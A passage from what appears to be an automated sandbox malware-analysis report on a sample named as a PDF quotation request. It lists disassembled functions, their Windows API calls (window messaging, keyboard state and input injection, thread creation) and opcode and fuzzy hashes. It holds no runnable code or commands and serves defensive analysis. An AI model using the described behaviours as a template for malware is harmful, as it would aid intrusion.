                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 3850602802-3636473452
                                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                    Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                    • String ID:
                                                                    • API String ID: 3985565216-0
                                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                    Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0041F707
                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                    • _free.LIBCMT ref: 0041F71A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID: [B
                                                                    • API String ID: 1020059152-632041663
                                                                    • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                    • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                    Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                    Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                    • String ID:
                                                                    • API String ID: 3220332590-0
                                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                    Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1612042205-0
                                                                    • Opcode ID: 00515ba70b49e7e079554eab0ba48c1405c4c8c1eac40979e81de5179a93b954
                                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                    • Opcode Fuzzy Hash: 00515ba70b49e7e079554eab0ba48c1405c4c8c1eac40979e81de5179a93b954
                                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                    Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove_strncmp
                                                                    • String ID: >$U$\
                                                                    • API String ID: 2666721431-237099441
                                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                    Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 2221674350-0
                                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                    Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2037614760-0
                                                                    • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                    • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                    Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                    • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                    • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                                    • String ID:
                                                                    • API String ID: 960795272-0
                                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                    Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 4189319755-0
                                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                    Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1976402638-0
                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                    Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                    Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 2487901850-572801152
                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
